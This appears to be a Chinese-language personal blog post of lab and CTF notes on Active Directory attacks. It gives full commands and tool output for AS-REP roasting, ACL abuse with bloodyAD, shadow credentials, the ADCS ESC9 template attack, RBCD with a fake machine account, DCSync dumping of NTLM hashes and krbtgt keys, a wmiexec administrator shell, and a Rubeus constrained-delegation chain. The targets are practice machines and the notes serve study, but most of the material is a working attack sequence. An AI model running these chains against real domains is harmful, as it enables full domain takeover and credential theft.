ad攻击小记

比较乱，梦到哪句写哪句

不管干什么事，同步域控时间准没错。

AS-REP Roasting攻击

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-GetNPUsers -usersfile users.txt -no-pass -dc-ip 10.129.231.186 certified.htb/    
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User judith.mader doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User management_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ca_operator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User alexander.huges doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User harry.wilson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gregory.cameron doesn't have UF_DONT_REQUIRE_PREAUTH set

bloodhound-python收集域信息

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodhound-python -c All -u judith.mader -p judith09 -ns 10.129.231.186 -d certified.htb -dc dc01.certified.htb --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 00M 23S
INFO: Compressing output into 20260218072121_bloodhound.zip

成员对组拥有WriteOwner权限

先修改所有者，把组变成自己

1
2
3

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodyAD -d certified.htb -u 'judith.mader' -p 'judith09' --host 10.129.231.186 set owner MANAGEMENT 'judith.mader'
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on MANAGEMENT

再将自己赋予完全控制权。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodyAD -d certified.htb -u 'judith.mader' -p 'judith09' --host 10.129.231.186 add genericAll MANAGEMENT 'judith.mader'
[+] judith.mader has now GenericAll on MANAGEMENT

将自己加入该组。

1
2
3

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodyAD -d certified.htb -u 'judith.mader' -p 'judith09' --host 10.129.231.186 add groupMember MANAGEMENT 'judith.mader'
[+] judith.mader added to MANAGEMENT

成员（组）对组（成员）拥有GenericWrite权限

修改成员的密码

1 2	`┌──(root㉿kaada)-[/home/kali/Desktop] └─# bloodyAD -d certified.htb -u 'judith.mader' -p 'judith09' --host 10.129.231.186 set password MANAGEMENT_SVC 'Pwned12345!'`

不过有时候会失败。

定向 AS-REP Roasting

对域控有GenericWrite权限（？？？实战中真有可能吗）

打RBCD

影子凭据攻击

在获取高权限用户后，通过给目标用户添加Shadow Credential（msDS-KeyCredentialLink属性），结合相关攻击工具获取到.pfx私钥证书文件，之后使用.pfx文件申请目标用户的TGT，进而得到其NTLM Hash。

在使用影子凭据之前记得先把时间和域控同步

┌──(root㉿kaada)-[/opt/get_dc_time]
└─# python3 get_dc_time.py -s 10.129.231.186
2026-02-19 03:49:36.000000
Local time set to: 2026-02-19 03:49:36

使用pywhisker

┌──(root㉿kaada)-[/opt/pywhisker-1.0.0/pywhisker]
└─# python3 pywhisker.py -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add" --dc-ip 10.129.231.186 --use-ldaps
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 7ba66598-d473-200b-e335-73693201fe6a
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: oigNgAOY.pfx
[*] Must be used with password: F7ddKVbzqkaPtLgqVxFX
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

使用certipy

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy-ad shadow auto -u 'judith.mader@certified.htb' -p 'judith09' -account Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '91c77677-13a9-3225-4533-8a5ec50d7c90'
[*] Adding Key Credential with device ID '91c77677-13a9-3225-4533-8a5ec50d7c90' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID '91c77677-13a9-3225-4533-8a5ec50d7c90' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584

成员（组）对组（成员）拥有GenericALL权限

同GenericWrite，可尝试修改密码。（这里是用的哈希凭证修改，密码修改同理）

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodyAD -d certified.htb -u 'management_svc' -p 'aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584' --host 10.129.231.186 set password CA_OPERATOR 'Pwned_CA_123!@#'
[+] Password changed successfully!

No Security Extension - ESC9

使用Certipy查找域相关证书信息

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy-ad find -u judith.mader@certified.htb -p judith09 -dc-ip 10.129.231.186
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'certified-DC01-CA'
[*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260219041503_Certipy.txt'
[*] Wrote text output to '20260219041503_Certipy.txt'
[*] Saving JSON output to '20260219041503_Certipy.json'
[*] Wrote JSON output to '20260219041503_Certipy.json'

存在NoSecurityExtension便可使用ESC9进行攻击

寻找漏洞证书模板。

Certificate Authorities
  0
    CA Name                             : certified-DC01-CA
    DNS Name                            : DC01.certified.htb
    Certificate Subject                 : CN=certified-DC01-CA, DC=certified, DC=htb
    Certificate Serial Number           : 36472F2C180FBB9B4983AD4D60CD5A9D
    Certificate Validity Start          : 2024-05-13 15:33:41+00:00
    Certificate Validity End            : 2124-05-13 15:43:41+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : CERTIFIED.HTB\Administrators
      Access Rights
        ManageCa                        : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        ManageCertificates              : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Enroll                          : CERTIFIED.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : PublishToDs
                                          AutoEnrollment
                                          NoSecurityExtension
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-05-13T15:48:52+00:00
    Template Last Modified              : 2024-05-13T15:55:20+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\operator ca
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\Administrator
        Full Control Principals         : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Owner Principals          : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Property Enroll           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFIED.HTB\operator ca
    [!] Vulnerabilities
      ESC9                              : Template has no security extension.
    [*] Remarks
      ESC9                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.

此漏洞的核心在于：对证书模板拥有注册权限的用户（如此处的 ca_operator）可以请求证书，并且由于模板配置不当（缺少必要的安全扩展，如 CT_FLAG_NO_SECURITY_EXTENSION 未设置），攻击者可以通过在证书请求中指定一个备用主体名 (SAN) 来冒充其他用户，例如域管理员。
————————————————
版权声明：本文为CSDN博主「人衣aoa」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/qq_45203884/article/details/148122349

使用 Certipy 工具将 NT hash (a091c1832bcdd4677c28b5a6a1295584) 更新到 ca_operator 账户，并修改了该账户的 userPrincipalName (UPN) 为 Administrator

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_operator'

请求到了一张代表管理员的证书

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy-ad req -u ca_operator@certified.htb -p 'Pwned_CA_123!@#' -ca certified-DC01-CA -template CertifiedAuthentication -debug
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[+] DC host (-dc-host) not specified. Using domain as DC host
[+] Nameserver: None
[+] DC IP: None
[+] DC Host: 'CERTIFIED.HTB'
[+] Target IP: None
[+] Remote Name: 'CERTIFIED.HTB'
[+] Domain: 'CERTIFIED.HTB'
[+] Username: 'CA_OPERATOR'
[+] Trying to resolve 'CERTIFIED.HTB' at '192.168.21.2'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.129.231.186
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.231.186[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.231.186[\pipe\cert]
[*] Request ID is 5
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

恢复ca的原始upn

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy-ad account -username management_svc@certified -hashes :a091c1832bcdd4677c28b5a6a1295584 -dc-ip '10.129.231.186' -upn 'ca_operator@certified.htb' -user 'ca_operator' update

Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'

使用 Certipy 工具，通过 administrator.pfx 证书文件以 administrator@certified.htb 用户身份进行 Kerberos 认证，并成功获取 TGT 和 NT hash

记得要先对齐域控时间（kerbros的五分钟原则）

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# sudo ntpdate 10.129.231.186
2026-02-18 15:30:20.560486 (-0500) -46560.448366 +/- 0.045121 10.129.231.186 s1 no-leap
CLOCK: time stepped by -46560.448366
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy-ad -debug auth -pfx administrator.pfx -username administrator -domain certified.htb -dc-ip 10.129.231.186
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[+] Target name (-target) and DC host (-dc-host) not specified. Using domain '' as target name. This might fail for cross-realm operations
[+] Nameserver: '10.129.231.186'
[+] DC IP: '10.129.231.186'
[+] DC Host: ''
[+] Target IP: '10.129.231.186'
[+] Remote Name: '10.129.231.186'
[+] Domain: ''
[+] Username: 'ADMINISTRATOR'
[*] Certificate identities:
[*]     SAN UPN: 'Administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[+] Sending AS-REQ to KDC certified.htb (10.129.231.186)
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[+] Attempting to write data to 'administrator.ccache'
[+] Data written to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

lookupsid枚举域用户

匿名 LookupSID 枚举（Anonymous LookupSID Enumeration），也常被称为 RID 循环/劫持 (RID Cycling)，是活动目录 (Active Directory) 渗透测试和 CTF 靶机中非常经典且高效的信息收集技术。

它的核心在于：攻击者在没有任何有效域凭证（即没有任何用户名和密码）的情况下，通过建立匿名连接（空会话），利用 Windows 系统的 RPC（远程过程调用）接口，暴力猜测并解析出域内所有的用户名和组名。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-lookupsid anonymous@192.168.21.130
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Brute forcing SIDs at 192.168.21.130
[*] StringBinding ncacn_np:192.168.21.130[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3649830887-1815587496-1699028491
498: NOVICE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: NOVICE\Administrator (SidTypeUser)
501: NOVICE\Guest (SidTypeUser)
502: NOVICE\krbtgt (SidTypeUser)
512: NOVICE\Domain Admins (SidTypeGroup)
513: NOVICE\Domain Users (SidTypeGroup)
514: NOVICE\Domain Guests (SidTypeGroup)
515: NOVICE\Domain Computers (SidTypeGroup)
516: NOVICE\Domain Controllers (SidTypeGroup)
517: NOVICE\Cert Publishers (SidTypeAlias)
518: NOVICE\Schema Admins (SidTypeGroup)
519: NOVICE\Enterprise Admins (SidTypeGroup)
520: NOVICE\Group Policy Creator Owners (SidTypeGroup)
521: NOVICE\Read-only Domain Controllers (SidTypeGroup)
522: NOVICE\Cloneable Domain Controllers (SidTypeGroup)
525: NOVICE\Protected Users (SidTypeGroup)
526: NOVICE\Key Admins (SidTypeGroup)
527: NOVICE\Enterprise Key Admins (SidTypeGroup)
553: NOVICE\RAS and IAS Servers (SidTypeAlias)
571: NOVICE\Allowed RODC Password Replication Group (SidTypeAlias)
572: NOVICE\Denied RODC Password Replication Group (SidTypeAlias)
1000: NOVICE\DC$ (SidTypeUser)
1101: NOVICE\DnsAdmins (SidTypeAlias)
1102: NOVICE\DnsUpdateProxy (SidTypeGroup)
1104: NOVICE\MrRobot (SidTypeUser)

RBCD（基于资源的约束委派）

第一步：创建机器账户

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-addcomputer novice.com/MrRobot:mrroboto12 -dc-ip 192.168.21.130 -computer-name 'EVILPC$' -computer-pass 'EvilPass123!'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account EVILPC$ with password EvilPass123!.

第二步：实施滥用 (写入委派属性)

我们将域控的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性修改为刚刚创建的 EVILPC$。

“逼迫域控承认：EVILPC$ 有资格代表任何人来访问我。”

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-rbcd -delegate-to 'DC$' -delegate-from 'EVILPC$' -dc-ip 192.168.21.130 -action 'write' 'novice.com/MrRobot:mrroboto12'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EVILPC$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     EVILPC$      (S-1-5-21-3649830887-1815587496-1699028491-2101)

第三步：伪造高权限票据 (S4U2Self & S4U2Proxy)

使用 EVILPC$ 的凭证，向域控申请一张伪造身份为 Administrator（或者任何高权限域管）的服务票据 (Service Ticket)。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-getST -spn 'cifs/DC.novice.com' -impersonate Administrator -dc-ip 192.168.21.130 'novice.com/EVILPC$:EvilPass123!'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.novice.com@NOVICE.COM.ccache

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ls
20260219050404_bloodhound.zip                       FScan_2.0.1_linux_x32            nc.exe         rustscan               sucrack
Administrator@cifs_DC.novice.com@NOVICE.COM.ccache

第四步：导入票据与 DCSync

用刚刚生成的票据导入环境变量让后续的 Impacket 工具自动使用它进行 Kerberos 认证（不要使用密码）

1
2
3

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# export KRB5CCNAME=Administrator@cifs_DC.novice.com@NOVICE.COM.ccache

执行DCsync攻击导出所有哈希

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-secretsdump -k -no-pass DC.novice.com
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x9aec2145c768b9975d683cbd0b2138e0
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
NOVICE\DC$:plain_password_hex:6454fcd3651871f06169975c90882651d512f6bd88eb6513625ba8d99345d3de876754b3e3f9bf58cfc3add6cb05f8bea733d5f0df9f622ab68b3daacf1d255bc441b453050330aab4c548c86c0f9a3c5f537964ae483ac161bbe74145a1dffb6a1859df45b64b02c01bdae24fcb58be1ea2ded8eee4bf0014ee73f5fcd8c3faa0bcc080b4f5233286f4fce1cfffe878b5ee4f79f9215cdf59d0151a0e516894562914031807df1bfd9b9f3df285e3f7b570ecc67d187bc0d982b17ddd307a4288a74854c9916887abd47a42ba7c70b6aa0cde01f8dc240dd556b1f2e5e083ff85022153174300275556b609ee322a19
NOVICE\DC$:aad3b435b51404eeaad3b435b51404ee:59895085a4120299fc9fb7158c5b310d:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xdead8f737ed36bb82d5a6f44687f0d926e30b276
dpapi_userkey:0xddbacb41fc6cd581597fa5ab3862023b5109d8b5
[*] NL$KM 
 0000   48 E8 ED C0 9F C8 D4 BE  37 81 D7 2B D4 B1 87 C1   H.......7..+....
 0010   3C A7 DA 68 3B CF 48 DF  9C 24 64 88 D4 83 8B F0   <..h;.H..$d.....
 0020   CE CA F8 FB 07 C8 07 0A  4A 5A F6 AD 11 DB 87 28   ........JZ.....(
 0030   B8 DD 0C E7 35 0E 1D 37  18 AA CA BD D6 C7 90 26   ....5..7.......&
NL$KM:48e8edc09fc8d4be3781d72bd4b187c13ca7da683bcf48df9c246488d4838bf0cecaf8fb07c8070a4a5af6ad11db8728b8dd0ce7350e1d3718aacabdd6c79026
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:34d77123d1c64e2da30028f21bbb91d0:::
MrRobot:1104:aad3b435b51404eeaad3b435b51404ee:c8fa8686516464c51cfc0bdc3e52ef9e:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:59895085a4120299fc9fb7158c5b310d:::
EVILPC$:2101:aad3b435b51404eeaad3b435b51404ee:2ce986df7478744a81b7d00446da7417:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:0218bc05d978eff9d49b5578b0b82d2b6f6fd19b47b55f91c07a555dac208574
Administrator:aes128-cts-hmac-sha1-96:4f3a074e29171c06ab3db041c1be2128
Administrator:des-cbc-md5:34701ccb6efb9704
krbtgt:aes256-cts-hmac-sha1-96:1767397277e40d45c7924647e4b2ce3b211a87bbe5aa345beba0cb95886d696f
krbtgt:aes128-cts-hmac-sha1-96:ab93922b57ce1a5ab5e6e8f4ea078f4e
krbtgt:des-cbc-md5:58a104e55ec89eb9
MrRobot:aes256-cts-hmac-sha1-96:7cd49c483c6f0e1977b9d0939c84f72d017724c26bb54d742309e70f0872a1d5
MrRobot:aes128-cts-hmac-sha1-96:67d90694c72b439b2921976fb1f775cf
MrRobot:des-cbc-md5:62b39b86f862d3fd
DC$:aes256-cts-hmac-sha1-96:c8f24757655c70f50c7ec4fdaa365848392a2a969b4da2c0e3fc4580290bd234
DC$:aes128-cts-hmac-sha1-96:f273380db059a96f5f66ea2cfdce97b0
DC$:des-cbc-md5:34ae2a0d1cd9ecdc
EVILPC$:aes256-cts-hmac-sha1-96:12bf6710bb192fe177171749e5a228cb0940b783561f2a88558e5adbe0b25b1a
EVILPC$:aes128-cts-hmac-sha1-96:1fc6a16715a142b4fb8a38b230bcf6d5
EVILPC$:des-cbc-md5:57ec67611675d089
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
Exception ignored in: <function Registry.__del__ at 0x7f06f7e08900>
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 172, in __del__
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 169, in close
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 409, in close
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 633, in closeFile
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1357, in close
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 474, in sendSMB
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 443, in signSMB
  File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC
  File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'
Exception ignored in: <function Registry.__del__ at 0x7f06f7e08900>
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 172, in __del__
  File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 169, in close
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 409, in close
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 633, in closeFile
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1357, in close
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 474, in sendSMB
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 443, in signSMB
  File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC
  File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 192.168.21.130 -u administrator -H bbabdc192282668fe5190ab0c5150b34
SMB         192.168.21.130  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:novice.com) (signing:True) (SMBv1:None) (Null Auth:True)                                                                                                                                                
SMB         192.168.21.130  445    DC               [+] novice.com\administrator:bbabdc192282668fe5190ab0c5150b34 (Pwn3d!)

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-wmiexec -k -no-pass DC.novice.com 
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
novice\administrator

针对 Domain Controller 的约束委派攻击

为了伪造域管（Administrator）去访问 DC 的 C$ 共享，攻击需要利用 Kerberos 协议的两个关键扩展协议：S4U2Self (Service for User to Self) 和 S4U2Proxy (Service for User to Proxy)。

前置条件：获取机器账户凭证

操作:使用 Mimikatz 从 172.22.2.16 的内存中导出了机器账户 MSSQLSERVER$ 的 NTLM Hash (f496fe749b403f432a5e2c0d49113a29) 。
- 原理：只有拥有该服务（机器）账户的凭证，才能以该服务的身份向 KDC（密钥分发中心）发起委派请求。
第一步：申请机器账户的 TGT

操作：执行 Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:f496... 。

原理：利用刚拿到的 NTLM Hash（RC4 加密），向域控伪造正常的 AS-REQ 请求，换取 MSSQLSERVER$ 这个机器账户的 TGT（票据授权票据）。
第二步：S4U2Self (服务代表用户向自己申请票据)

操作：包含在 Rubeus.exe s4u /impersonateuser:Administrator ... 命令的底层执行中

原理：MSSQLSERVER$ 拿着自己的 TGT 告诉 KDC：“域管 Administrator 正在访问我，请给我一张 Administrator 访问我自己的 TGS（服务票据）”。由于 S4U2Self 的特性，KDC 不需要验证 Administrator 的密码，直接返回一张以 Administrator 身份访问 MSSQLSERVER$ 的 TGS。且此票据带有 forwardable（可转发）属性。
第三步：S4U2Proxy (代表用户向其他服务申请票据)

操作：请求指定服务 /msdsspn:CIFS/DC.xiaorang.lab /ptt 。

原理：MSSQLSERVER$ 再次联系 KDC ：“我现在要代表 Administrator 去访问域控的 CIFS 服务（文件共享），这是刚刚你给我的、带有可转发属性的 Administrator 的 TGS”。KDC 检查 Active Directory 属性，发现 MSSQLSERVER$ 确实被配置了到 CIFS/DC.xiaorang.lab 的约束委派权限。验证通过，KDC 生成一张 Administrator 访问域控 CIFS 的最终 TGS，发给 MSSQLSERVER$。
第四步：凭证注入与利用

操作：Rubeus的 /ptt (Pass-The-Ticket) 参数直接将最后获取的高权限 TGS 注入到当前内存会话中

原理：此时当前系统的上下文已经拥有了域管访问 DC 共享目录的合法票据，因此可以直接通过 dir \\DC.xiaorang.lab\c$ 列出并读取 flag04.txt ，完成对整个域环境的最终攻陷。

+2

#杂记

ad攻击小记

http://example.com/2026/02/18/ad攻击小记/

Author

Skyarrow

Posted on

February 18, 2026

Licensed under

春秋云境-Brute4Road Previous

HackTheBox-WingData Next